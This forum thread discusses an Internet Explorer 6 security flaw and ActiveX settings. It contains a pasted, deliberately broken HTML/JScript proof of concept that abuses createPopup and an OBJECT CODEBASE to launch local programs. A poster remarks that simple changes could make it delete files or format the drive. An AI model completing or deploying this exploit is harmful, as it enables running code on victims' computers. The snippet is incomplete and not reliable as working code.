"people who limited their browsing to trusted sites would be safe as would people who had installed one of the software giant's patches for its e-mail clients. "

Which is mandatory. No patches, no security.

"Larholm recommended that users disable ActiveX in the security settings for Internet Explorer"

LMAO. I mean... ActiveX means anyone can run any program he chooses on my PC. If you have ActiveX turned on, you don't need to worry about bug abuse... you gave all of the world permission to ruin your PC at will anyway.

On my IE, virtually everything is disabled, including cookies, Java, and InActiveX thingies.

If a site requires me to enable Java or InActiveX or jump through some other hoop, I usually avoid it, unless I know that I really want the information on it...

In which case I use Opera, which is configured to be more relaxed.

Maybe I'm just paranoid.

I think it's talking about this flaw:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName = new Array(


function Init()
var oPopup = window.createPopup();
var oPopBody = oPopup.document.body;
var n, html='';

for(n = 0; n < programName.length; n++)
html += "<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+ programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML = html;
oPopup.show(290, 390, 200, 200, document.body);
You should feel lucky if your computer doesn't get reformatted right now.

I commented out a line so it doesn't work...

Where did that code come from? Enlighten me please! Ans it is BAD, right?

That? No, it's harmless. Also, it doesn't work because I removed a line. It WOULD open solitare :) Although, with a simple modification it could log you off, delete stuff, format and whatnot.

I forget exactly where I got it, but I remember it was set to log you off, so I telnetted to the website and downloaded the html. It looked harmless to me, the extension was .jpg but the browser still interpreted it as HTML.